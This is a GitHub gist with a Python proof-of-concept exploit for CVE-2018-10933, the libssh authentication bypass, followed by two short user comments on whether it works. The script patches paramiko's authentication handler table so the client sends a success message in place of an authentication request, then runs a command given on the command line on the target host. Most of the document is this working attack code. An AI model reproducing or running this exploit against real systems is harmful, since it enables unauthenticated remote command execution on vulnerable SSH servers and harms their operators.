Skip to content

Instantly share code, notes, and snippets.

@thinkycx
Forked from mlosapio/CVE-2018-10933-test
Last active October 21, 2018 15:52
Show Gist options
  • Save thinkycx/6ec27dc470de03fb16c2f447dbbbd070 to your computer and use it in GitHub Desktop.
Save thinkycx/6ec27dc470de03fb16c2f447dbbbd070 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
'''
# fixed - test by thinkycx and
Traceback (most recent call last):
File "10933.py", line 12, in <module>
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_SUCCESS]
TypeError: 'property' object has no attribute '__getitem__'
pip install paramiko==2.0.8
'''
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_USERAUTH_SUCCESS]
def auth_accept(*args, **kwargs):
return new_auth_accept(*args, **kwargs)
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})
port = 22
try:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
stdin, stdout, stderr = client.exec_command(command)
print stdout.read(),
finally:
client.close()
@thorvn
Copy link

thorvn commented Oct 17, 2018

It not work guy

@thinkycx
Copy link
Author

It not work guy

Hello,maybe it‘s difficult to get shell . You can only see that your channel session is auth success.

For more info, see here with google translation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment